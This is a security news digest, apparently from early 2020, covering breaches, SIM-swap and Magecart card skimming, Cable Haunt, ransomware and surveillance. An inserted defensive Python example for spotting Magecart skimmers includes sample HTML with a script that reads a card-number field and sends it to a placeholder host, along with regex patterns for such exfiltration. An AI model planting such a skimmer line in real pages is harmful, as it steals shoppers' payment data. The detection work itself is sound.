Table of Contents

  1. Leaks
    1. Go Games - 3,430,083 breached accounts
    2. Indian Railways - 583,377 breached accounts
    3. A billion medical images are exposed online, as doctors ignore warnings
  2. Crime
    1. SIM Swappers Are Using RDP To Directly Access Internal T-Mobile, AT&T, and Sprint Tools
    2. Beware of Amazon Prime Support Scams in Google Search Ads
    3. Two MageCart groups competed to steal credit card data from Perricone MD's European skincare sites
    4. Australia Bushfire Donors Affected by Credit Card Skimming Attack
  3. Vulnerabilities
    1. An Empirical Study of Wireless Carrier Authentication for SIM Swaps
    2. Hundreds of millions of cable modems are vulnerable to new Cable Haunt vulnerability
    3. US Govt Warns of Attacks on Unpatched Pulse VPN Servers
  4. Ransomware
    1. Maze Ransomware Publishes 14GB of Stolen Southwire Files
    2. Albany County Airport authority hit by a ransomware attack
    3. Ako Ransomware: Another Day, Another Infection Attacking Businesses
  5. Digital rights
    1. Indian Supreme Court Finds 150-Day Internet Blackout In Kashmir Illegal
  6. Google
    1. Over 50 Organizations Ask Google To Take a Stand Against Android Bloatware
    2. Google Chrome Will Support Windows 7 After End of Life
  7. Facebook
    1. A Facebook Bug Exposed Anonymous Admins of Pages
  8. Surveillance
    1. Police Surveillance Tools from Special Services Group
  9. Exploit development
    1. Exploit for ashmem android vulnerability

Leaks

Go Games - 3,430,083 breached accounts

In approximately October 2015, the manga website Go Games suffered a data breach. The exposed data included 3.4M customer records including email and IP addresses, usernames and passwords stored as salted MD5 hashes. Go Games did not respond when contacted about the incident. The data was provided to HIBP by dehashed.com.

Indian Railways - 583,377 breached accounts

In November 2019, the website for Indian Rail left more than 2M records exposed on an unprotected Firebase database instance. The exposed data included 583k unique email addresses alongside usernames and passwords stored in plain text.

A billion medical images are exposed online, as doctors ignore warnings

Insecure storage systems being used by hundreds of hospitals, medical offices and imaging centers are exposing over 1 billion medical images of patients across the world. "Yet despite warnings from security researchers who have spent weeks alerting hospitals and doctors' offices to the problem, many have ignored their warnings and continue to expose their patients' private health information," writes Zack Whittaker from TechCrunch. From the report: "It seems to get worse every day," said Dirk Schrader, who led the research at Germany-based security firm Greenbone Networks, which has been monitoring the number of exposed servers for the past year. The problem is well-documented. In September, Greenbone found 24 million patient exams storing more than 720 million medical images, a finding that first revealed the scale of the problem, as reported by ProPublica. Two months later, the number of exposed servers had increased by more than half, to 35 million patient exams, exposing 1.19 billion scans and representing a considerable violation of patient privacy.

Crime

SIM Swappers Are Using RDP To Directly Access Internal T-Mobile, AT&T, and Sprint Tools

Hackers are now getting telecom employees to run software that lets the hackers directly reach into the internal systems of U.S. telecom companies to take over customer cell phone numbers, Motherboard has learned. Multiple sources in and familiar with the SIM swapping community as well as screenshots shared with Motherboard suggest at least AT&T, T-Mobile, and Sprint have been impacted. The technique uses Remote Desktop Protocol (RDP) software. RDP lets a user control a computer over the internet rather than being physically in front of it. It's commonly used for legitimate purposes such as customer support. But scammers also make heavy use of RDP. In an age-old scam, a fraudster will phone an ordinary consumer and tell them their computer is infected with malware. To fix the issue, the victim needs to enable RDP and let the fake customer support representative into their machine. From here, the scammer could do all sorts of things, such as logging into online bank accounts and stealing funds.

Beware of Amazon Prime Support Scams in Google Search Ads

A malicious ad campaign is underway in Google Search results that leads users to fake Amazon support sites and tech support scams. A security researcher reached out to BleepingComputer today about search keywords such as "amazon prime" and "amazon prime customer support" that lead to ads pretending to be Amazon Prime support.

Two MageCart groups competed to steal credit card data from Perricone MD's European skincare sites

Two distinct MageCart groups have compromised multiple European websites for the Perricone MD anti-aging skin-care brand with the intent of stealing customer payment card info. The two groups planted software skimmers on Perricone MD websites in Italy, Germany, and the U.K.; fortunately, no credit card data appears to have been stolen at the time. "During research into Magecart attacks, we recently uncovered malicious code from two hacking groups attempting to steal credit card information on the European e-commerce websites for the science-backed skincare brand Perricone MD (affecting perriconemd.co.uk, perriconemd.it and perriconemd.de)," reads the post from RapidSpike.

Australia Bushfire Donors Affected by Credit Card Skimming Attack

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals the payment information of the donors. This type of attack is called Magecart and involves hackers compromising a website and injecting malicious JavaScript into eCommerce or checkout pages. These scripts then steal any credit card or payment information that is submitted and send it off to a remote site under the attacker's control. The Malwarebytes Threat Intelligence Team has discovered a legitimate website collecting donations for the tragic bushfires in Australia that has been compromised by a Magecart script.
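The Perricone MD and bushfire-donation items above both describe the same Magecart pattern: an injected script on a checkout page reads payment fields and ships them to an attacker-controlled host. Added example (not code from any of the articles or companies mentioned): a static check a site owner can run over their own checkout HTML that flags scripts loaded from hosts outside an allowlist and inline scripts that both touch payment fields and contain an outbound-network call. The allowlist, the regex heuristics and the sample page are constructed assumptions for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic patterns (assumptions for this example, not signatures from a real campaign)
PAYMENT_FIELD = re.compile(r"card|cvv|cvc|expir", re.I)
EXFIL_SINK = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(", re.I)
ALLOWED_HOSTS = {"cdn.shop.example"}  # hosts the shop legitimately loads scripts from

# Constructed sample page: same-origin script, allowlisted CDN, unexpected host, inline snippet
SAMPLE_CHECKOUT = """<html><body>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/app.js"></script>
<script src="https://cdn-stats.invalid/jquery.min.js"></script>
<script>var n = document.getElementById('card-number').value;
navigator.sendBeacon('https://c.invalid/x', n);</script>
</body></html>"""

class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_inline = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline = True
    def handle_data(self, data):
        if self._in_inline:  # HTMLParser hands script bodies to handle_data as raw text
            self.inline.append(data)
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False

def find_suspicious_scripts(html, allowed_hosts):
    """Return (kind, detail) findings: off-allowlist script hosts and inline exfil patterns."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for a relative (same-origin) src
        if host and host not in allowed_hosts:
            findings.append(("unexpected-external-script", src))
    for body in parser.inline:
        if PAYMENT_FIELD.search(body) and EXFIL_SINK.search(body):
            findings.append(("inline-form-exfil-pattern", body.strip()[:40]))
    return findings
```

Run it against a saved copy of the checkout page on a schedule and alert on any new finding; a Content Security Policy with Subresource Integrity on the allowed scripts is the corresponding preventive control.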

Vulnerabilities

An Empirical Study of Wireless Carrier Authentication for SIM Swaps

Researchers have done a study of 140 websites that offer SMS-based authentication, and rated the vulnerability level of users of each website to a SIM swap attack.

Hundreds of millions of cable modems are vulnerable to new Cable Haunt vulnerability

A team of four Danish security researchers has disclosed this week a security flaw that impacts cable modems that use Broadcom chips. The vulnerability, codenamed Cable Haunt, is believed to impact an estimated 200 million cable modems in Europe alone, the research team said today. The vulnerability impacts a standard component of Broadcom chips called a spectrum analyzer. This is a hardware and software component that protects the cable modem from signal surges and disturbances coming via the coax cable. The component is often used by internet service providers (ISPs) in debugging connection quality. On most cable modems, access to this component is limited for connections from the internal network.

US Govt Warns of Attacks on Unpatched Pulse VPN Servers

The US Cybersecurity and Infrastructure Security Agency (CISA) today alerted organizations to patch their Pulse Secure VPN servers as a defense against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability. This warning follows another alert issued by CISA in October 2019, and others coming from the National Security Agency (NSA), the Canadian Centre for Cyber Security, and UK's National Cyber Security Center (NCSC). Pulse Secure reported the vulnerability tracked as CVE-2019-11510 and disclosed by Orange Tsai and Meh Chang from the DEVCORE research team, and by Jake Valletta from FireEye in an April 2019 out-of-cycle advisory.

Ransomware

Maze Ransomware Publishes 14GB of Stolen Southwire Files

The Maze Ransomware operators have released an additional 14GB of files that they claim were stolen from one of their victims for not paying a ransom demand. In December the Maze Ransomware operators attacked Southwire, a wire and cable manufacturer out of Georgia, and allegedly stole 120GB worth of files before encrypting 878 devices on the network. Maze then demanded $6 million in bitcoins or they would publicly release Southwire's stolen files. When Southwire did not make a payment, the Maze operators uploaded some of the company's files to a "News" site that they had created to shame non-paying victims.

Albany County Airport authority hit by a ransomware attack

Officials at the Albany County Airport Authority announced this week that a ransomware attack hit the New York airport and its computer management provider LogicalNet over Christmas. The news of the attack was disclosed after LogicalNet reported its own management services network had been breached. According to the experts, the ransomware encrypted files on the authority's servers and its backup servers. Experts reported that the family of malware involved in the attack against LogicalNet was the Sodinokibi ransomware, the same malicious code that infected systems at the London-based Travelex currency exchange.

Ako Ransomware: Another Day, Another Infection Attacking Businesses

Like moths to a flame, new ransomware targeting businesses keeps appearing every day, enticed by the prospect of million-dollar ransom payments. An example of this is a new ransomware called Ako that targets the entire network rather than just individual workstations. Ako was discovered yesterday when a victim posted in the BleepingComputer support forums about a new ransomware that had encrypted both their Windows 10 desktop and their Windows SBS 2011 server.

Digital rights

Indian Supreme Court Finds 150-Day Internet Blackout In Kashmir Illegal

Kashmir's status within India has been a topic of controversy for decades. But on Friday, India's highest court rejected the government's rationale, arguing that the blackout violated Indian telecommunications laws. "Freedom of Internet access is a fundamental right," justice N. V. Ramana said. "The Supreme Court ruling won't lead to an immediate restoration of Internet access in Kashmir, however," the report adds. "Instead, India's highest court has given the government a week to revise its policies. The court also required the government to be more transparent about its Internet shutdown orders."

Google

Over 50 Organizations Ask Google To Take a Stand Against Android Bloatware

In an open letter published yesterday, more than 50 organizations have asked Google to take action against Android smartphone vendors who ship devices with unremovable pre-installed apps, also known as bloatware. The letter, signed by 53 organizations, was addressed to Google CEO Sundar Pichai. Signees say Android bloatware has a detrimental effect on user privacy. They say many bloatware apps cannot be deleted and leave users exposed to having their data collected by unscrupulous phone vendors and app makers without their knowledge or consent. "These pre-installed apps can have privileged custom permissions that let them operate outside the Android security model," the open letter reads. Privacy International, the driving force behind this initiative, has also set up a petition page where normal users can add their voice to this campaign and put pressure on Google to intervene.

Google Chrome Will Support Windows 7 After End of Life

Google has officially stated that they will continue to support the Chrome browser on Windows 7 to give businesses more time to migrate to Windows 10. On January 14th, 2020, Windows 7 will reach End of Life, which means that unless you purchased Extended Security Updates licenses, Microsoft will no longer provide vulnerability or bug fixes for the operating system. For businesses, migrating to a new operating system can be a long and arduous task, and while some may argue that organizations have had enough time to do so, many factors could come into play that delay this migration.

Facebook

A Facebook Bug Exposed Anonymous Admins of Pages

Facebook Pages give public figures, businesses, and other entities a presence on Facebook that isn't tied to an individual profile. The accounts behind those pages are anonymous unless a Page owner opts to make the admins public. You can't see, for example, the names of the people who post to Facebook on WIRED's behalf. All it took to exploit the bug was opening a target page and checking the edit history of a post. "People who run sensitive Pages from their own Facebook should now consider that their identity may be known," Olejnik says.

Surveillance

Police Surveillance Tools from Special Services Group

Special Services Group, a company that sells surveillance tools to the FBI, DEA, ICE, and other US government agencies, has had its secret sales brochure published. Motherboard received the brochure as part of a FOIA request to the Irvine Police Department in California.

Exploit development

Exploit for ashmem android vulnerability

Android suffers from ashmem read-only bypass vulnerabilities via remap_file_pages() and ASHMEM_UNPIN. The vulnerability was patched in the January security bulletin.